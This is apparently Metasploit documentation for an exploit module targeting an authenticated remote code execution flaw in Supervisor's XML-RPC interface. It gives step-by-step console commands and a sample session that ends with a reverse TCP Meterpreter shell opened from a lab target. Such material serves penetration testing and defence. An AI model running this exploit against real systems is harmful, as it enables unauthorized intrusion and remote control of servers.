metasploit-gs/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md

Vulnerable Application

This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2

This has been tested with versions 3.2.0 and 3.3.2

Verification Steps

1. msf > use exploit/linux/http/supervisor_xmlrpc_exec
2. msf > set lhost 192.168.0.2
3. msf > set rhost 192.168.0.19
4. msf > set httpusername user (optional)
5. msf > set httppassword 123 (optional)
6. msf > exploit
7. A meterpreter session should have been opened successfully

Options

• HttpUsername - Username for HTTP basic auth (optional)
• HttpPassword - Password for HTTP basic auth (optional)
• TARGETURI - The path to the XML-RPC endpoint

Scenarios

msf > use exploit/linux/http/supervisor_xmlrpc_exec 
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check 

[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100

meterpreter >